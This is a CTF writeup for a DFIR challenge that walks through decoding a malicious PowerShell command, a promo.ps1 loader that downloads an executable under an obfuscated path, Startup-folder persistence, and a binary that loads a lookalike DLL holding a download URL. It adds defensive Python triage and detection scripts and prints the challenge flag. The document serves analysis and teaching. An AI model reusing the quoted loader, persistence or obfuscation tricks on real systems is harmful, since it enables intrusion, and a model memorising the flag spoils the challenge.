IT-Waves Finals writeups 2025

IT-Waves Finals CTF

In this post, I'll walk through some of the challenges from the IT-Waves Finals CTF and how I approached them.

Challenge 1: Lupin - DFIR

Description

We were given a single file: Lupin.id1. That's all.

Analysis

Checking the command history revealed this line:

powershell.exe -ExecutionPolicy Bypass -EncodedCommand cG93ZXJzaGVsbC5leGUgLUV4ZWN1dGlvbkRvbWFpbiBCeXBhc3MgLUZpbGUgQzpcVXNlcnNcTXJUb2dvb1xBcHBEYXRhXFJvYW1pbmdcTWljcm9zb2Z0XFdpbmRvd3NcU3RhcnQgTWVudVxQcm9ncmFtc1xTdGFydHVwXHByb21vLnBzMQ==

It's clearly Base64-encoded. Decoding it gives:

powershell.exe -ExecutionDomain Bypass -File C:\Users\MrTogoo\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\promo.ps1

Solution

This led us to the promo.ps1 script. Here's what it contained:

[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;

$b64 = "aHR0cHM6Ly9jdGYuY3liZXJzcGFjZS5leGFtcGxlLmNvbS9zY3Zob3N0LmV4ZQ==";
$url = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b64));
$dest = -join @("C:","\","Wi","ndow","s","\S","y","sMa","in",".","exe");

Decoding the URL yields:

https://ctf.cyberspace.example.com/scvhost.exe

Although the link was dead, we found that the script saved the binary as SysMain.exe using an obfuscated path.
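The two decoding steps above (the -EncodedCommand argument from the command history, then the Base64 literal and the -join path trick inside promo.ps1) are the kind of thing worth scripting so they are repeatable across cases. Below is a small Python triage helper I wrote for this writeup; it is not part of the challenge files. It takes the command line and the script text as found, decodes the encoded command (handling the real PowerShell UTF-16LE form as well as the plain UTF-8 form used here), flags the Startup-folder persistence path, decodes quoted Base64 literals, and folds `-join @(...)` string arrays back into the path they build. The Base64 strings and script lines are copied from the challenge; `encode_for_powershell` and the function names are my own.

```python
import base64
import re

# Artefacts copied from the writeup; everything around them is an added example.
COMMAND_LINE = (
    "powershell.exe -ExecutionPolicy Bypass -EncodedCommand "
    "cG93ZXJzaGVsbC5leGUgLUV4ZWN1dGlvbkRvbWFpbiBCeXBhc3MgLUZpbGUgQzpcVXNlcnNcTXJUb2dvb1xBcHBEYXRhXFJvYW1pbmdcTWljcm9zb2Z0XFdpbmRvd3NcU3RhcnQgTWVudVxQcm9ncmFtc1xTdGFydHVwXHByb21vLnBzMQ=="
)

PROMO_PS1 = r'''
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;
$b64 = "aHR0cHM6Ly9jdGYuY3liZXJzcGFjZS5leGFtcGxlLmNvbS9zY3Zob3N0LmV4ZQ==";
$url = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b64));
$dest = -join @("C:","\","Wi","ndow","s","\S","y","sMa","in",".","exe");
'''

# -EncodedCommand may be abbreviated (-e, -ec, -enc); the argument is plain Base64.
ENC_ARG_RE = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
B64_LITERAL_RE = re.compile(r'"([A-Za-z0-9+/]{16,}={0,2})"')
JOIN_ARRAY_RE = re.compile(r"-join\s+@\(([^)]*)\)")


def decode_encoded_command(b64: str) -> str:
    """Decode an -EncodedCommand payload.

    Genuine PowerShell encodes the command as UTF-16LE, so ASCII text shows a
    zero high byte in every second position. This challenge used plain UTF-8,
    so fall back to that when the UTF-16LE pattern is absent.
    """
    raw = base64.b64decode(b64, validate=True)
    if raw and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le")
    try:
        return raw.decode("utf-8")
    except UnicodeDecodeError:
        return raw.decode("utf-16-le", errors="replace")


def encode_for_powershell(text: str) -> str:
    """Build the UTF-16LE Base64 form PowerShell itself expects (used to test the decoder)."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


def decode_base64_literals(script: str) -> dict:
    """Return {literal: decoded} for every quoted literal that decodes to printable UTF-8."""
    found = {}
    for lit in B64_LITERAL_RE.findall(script):
        try:
            text = base64.b64decode(lit, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if text.isprintable():
            found[lit] = text
    return found


def resolve_join_arrays(script: str) -> list:
    """Concatenate the string literals of each `-join @("a","b",...)` expression."""
    return ["".join(re.findall(r'"([^"]*)"', body)) for body in JOIN_ARRAY_RE.findall(script)]


def triage(command_line: str, script: str) -> dict:
    """Run all three steps and report the indicators a DFIR analyst wants to see."""
    m = ENC_ARG_RE.search(command_line)
    decoded = decode_encoded_command(m.group(1)) if m else None
    # A script launched from the per-user Startup folder survives logoff/logon.
    persistence = bool(decoded) and "\\start menu\\programs\\startup\\" in decoded.lower()
    return {
        "decoded_command": decoded,
        "startup_persistence": persistence,
        "base64_strings": decode_base64_literals(script),
        "joined_paths": resolve_join_arrays(script),
    }


if __name__ == "__main__":
    for key, value in triage(COMMAND_LINE, PROMO_PS1).items():
        print(f"{key}: {value}")
```

The UTF-16LE check matters in practice: a decoder that only tries UTF-8 will print CJK-looking garbage for a real -EncodedCommand, and one that only tries UTF-16LE would have mangled this challenge's payload.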

140001468        __main()
140001474        char const* const var_68 = "C:\Windows\user32.dll"
14000147f        char const* const var_60 = "C:\Windows\secur32.dll"
14000148a        char const* const var_58 = "C:\Windows\kernel32.dll"
140001495        char const* const var_50 = "C:\Windows\shell32.dll"
1400014a0        char const* const var_48 = "C:\Windows\user36.dll"
1400014ab        char const* const var_40 = "C:\Windows\advapi32.dll"
1400014b6        char const* const var_38 = "C:\Windows\ws2_32.dll"
1400014c1        char const* const var_30 = "C:\Windows\gdi32.dll"
1400014cc        char const* const var_28 = "C:\Windows\msvcrt.dll"
1400014d7        char const* const var_20 = "C:\Windows\comdlg32.dll"
1400014db        int32_t var_10 = 0xa
1400014db
14000155e        for (int32_t i = 0; i s< var_10; i += 1)
14000150a            if (LoadLibraryA((&var_68)[sx.q(i)]) != 0)
14000154f                __mingw_printf("Successfully loaded DLL: %s\n", (&var_68)[sx.q(i)])
14000150a            else
140001513                GetLastError()
140001531                __mingw_printf("Failed to load DLL: %s (Error: %…", (&var_68)[sx.q(i)])
140001531
14000156c        while (true)
14000156c            Sleep(0xea60)

Analysing it, the binary loads multiple system DLLs, and among them is a suspicious one: user36.dll (non-standard). Analysing user36.dll further, we discovered a hardcoded URL pointing to a ZIP file:

30f9ea058  char const data_30f9ea058[0xee] = "https://download1529.mediafire.com/zunoak6a5u5glqQdafJviNiFzhVrk33hYWTsCj62HRen83qU8CTWeSniyXYY1HnoeZwPSEeH"
30f9ea058      "LWG2_S0ndAHcMBOEo85XfoYNtZI0ypvpgv6R9ENJtcdmWi48cJZ8TjDYl24jY3CjKevyZNAwQk1jIqtX9ygsWp3NhptkGy0QgRgP/6vxi2yxw8btaw3r/passwords.zip", 0
30f9ea146  char const data_30f9ea146[0x13] = "Error opening URL.", 0
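Spotting user36.dll among a list of otherwise legitimate names is easy by eye in a ten-entry loop, but not in a real binary with hundreds of strings. As an added example (mine, not from the challenge), the Python below scans extracted strings for DLL names, checks each against an allowlist of genuine Windows DLLs, and uses edit distance to separate a lookalike such as user36.dll from a merely unknown module; it also pulls out any embedded URLs. The DLL path strings are the ones from the decompiled listing above; the allowlist is a constructed minimal one, and the download URL is a constructed placeholder standing in for the real link found in user36.dll.

```python
import re

# Allowlist of genuine Windows DLL names. Constructed for this example; a real
# one would be generated from a clean reference system or a signed-file catalogue.
KNOWN_DLLS = {
    "user32.dll", "secur32.dll", "kernel32.dll", "shell32.dll", "advapi32.dll",
    "ws2_32.dll", "gdi32.dll", "msvcrt.dll", "comdlg32.dll", "ntdll.dll", "ole32.dll",
}

# Strings as they appear in the decompiled listing, plus a constructed placeholder
# URL in place of the real download link.
SAMPLE_STRINGS = [
    r"C:\Windows\user32.dll", r"C:\Windows\secur32.dll", r"C:\Windows\kernel32.dll",
    r"C:\Windows\shell32.dll", r"C:\Windows\user36.dll", r"C:\Windows\advapi32.dll",
    r"C:\Windows\ws2_32.dll", r"C:\Windows\gdi32.dll", r"C:\Windows\msvcrt.dll",
    r"C:\Windows\comdlg32.dll",
    "Successfully loaded DLL: %s\n",
    "https://example.invalid/drop/passwords.zip",  # constructed placeholder
    "Error opening URL.",
]

DLL_RE = re.compile(r"[\w.-]+\.dll")
URL_RE = re.compile(r"https?://[^\s\"']+")


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance via the classic two-row dynamic programme."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_dll(name: str, known=KNOWN_DLLS, max_distance: int = 2):
    """Return ("known", None), ("lookalike", closest_real_name) or ("unknown", None)."""
    n = name.lower()
    if n in known:
        return "known", None
    closest = min(known, key=lambda k: edit_distance(n, k))
    if edit_distance(n, closest) <= max_distance:
        return "lookalike", closest
    return "unknown", None


def scan_strings(strings) -> dict:
    """Classify every DLL name seen in the strings and collect embedded URLs."""
    report = {"known": [], "lookalike": [], "unknown": [], "urls": []}
    seen = set()
    for s in strings:
        for name in DLL_RE.findall(s):
            if name.lower() in seen:
                continue
            seen.add(name.lower())
            verdict, reference = classify_dll(name)
            report[verdict].append(name if reference is None else (name, reference))
        report["urls"].extend(URL_RE.findall(s))
    return report


if __name__ == "__main__":
    for key, value in scan_strings(SAMPLE_STRINGS).items():
        print(f"{key}: {value}")
```

The distance threshold is a trade-off: 2 catches single-digit swaps like user36/user32 but will also pair short, legitimately similar names, so treat "lookalike" as a prompt to check the file's signature and on-disk location rather than as a verdict.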

Once downloaded and extracted, we cracked the ZIP and found the flag inside a text file; a simple grep did the job.

Flag

CSP{N0TH1NG_34SY_1N_DF1R}

[More writeups after the exams...]